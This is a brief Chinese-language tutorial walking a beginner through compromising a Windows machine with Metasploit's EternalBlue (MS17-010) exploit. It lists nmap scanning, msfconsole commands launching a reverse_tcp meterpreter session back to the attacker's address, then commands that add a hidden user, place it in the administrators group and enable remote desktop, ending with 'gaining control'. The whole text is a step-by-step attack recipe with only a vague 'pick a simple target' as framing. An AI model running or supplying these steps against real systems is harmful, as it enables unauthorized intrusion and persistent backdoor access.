在初次学习中,选择一个简单的目标进行测试!!!
#注:当遇到“meterpreter >”时!!!,说明你已经可以成功一半了
①首先通过nmap -v -A XXX.XXX.XXX.XXX检测.
在检测完XXX.XXX.XXX.XXX的端口号后,通过“msfconsole”启动控制,得到“msf6”.
②得到“msf6”后,利用Windows中的"ipconfig"和linux中的"ifconfig"获得IP地址.
msf6 > use exploit/windows/smb/ms17_010_eternalblue
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms17_010_eternalblue) > set lhost XXX.XXX.XXX.XXX
lhost => XXX.XXX.XXX.XXX
msf6 exploit(windows/smb/ms17_010_eternalblue) > set rhosts XXX.XXX.XXX.XXX
rhosts =>XXX.XXX.XXX.XXX
msf6 exploit(windows/smb/ms17_010_eternalblue) > run
③然后通过“sysinfo”查询信息.
④得到“meterpreter”后,通过以下操作获得权限
meterpreter> shell
cmd> net user XXXX XXXX@ /add
cmd>net localgroup administrs XXXX /add
cmd>exit meterpreter>run getgui -e
⑤最后得到控制权限!!
#注:
自身系统域名XXX.XXX.XXX.XXX与其他系统域名XXX.XXX.XXX.XXX不一致时,需要开始嫁接.